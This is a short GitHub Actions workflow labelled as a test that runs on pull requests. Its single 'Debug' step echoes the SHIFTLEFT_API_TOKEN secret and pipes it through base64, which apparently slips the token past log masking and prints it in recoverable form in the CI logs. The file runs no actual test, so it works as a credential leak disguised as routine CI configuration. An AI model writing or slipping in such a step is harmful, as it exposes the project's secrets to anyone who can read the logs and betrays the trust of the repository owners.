name: Testing

on:
  pull_request:
    types: ['opened', 'reopened', 'synchronize']

jobs:
  debug:
    name: Debug
    runs-on: ubuntu-latest
    steps:
      - name: Test
        run: |
          echo ${{secrets.SHIFTLEFT_API_TOKEN}} | base64
